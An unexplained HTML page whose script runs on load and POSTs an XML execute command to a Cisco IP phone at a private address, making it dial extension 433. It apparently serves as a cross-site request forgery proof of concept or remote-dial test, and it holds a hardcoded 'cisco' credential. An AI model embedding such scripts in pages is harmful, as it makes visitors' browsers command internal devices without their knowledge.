<html>
	<body>
		<html>
<body>

<script type="text/javascript">
 credantial = 'cisco'
 xmlhttp=new XMLHttpRequest();
 /*xmlhttp.setRequestHeader("Content-Type", "text/xml")
 xmlhttp.onreadystatechange=function() {
  if (xmlhttp.readyState==4) {
   alert(xmlhttp.responseText)
  }
 }*/
 xmlhttp.open("POST", "http://172.20.0.170/CGI/Execute",true);
 xmlhttp.setRequestHeader("Man", "POST http://172.20.0.170/CGI/Execute HTTP/1.1")
 xmlhttp.setRequestHeader("MessageType", "CALL")
 xmlhttp.setRequestHeader("Content-Type", "text/xml")
 
 xmlhttp.send("<?xml version='1.0' encoding='UTF-8'?>"+"\n\n"+"<CiscoIPPhoneExecute>" +
 	  " <ExecuteItem URL='Dial:433:1:Cisco/Dialer' />"+"\n" +
	  " </CiscoIPPhoneExecute>");
</script>


</body>
</html>
		
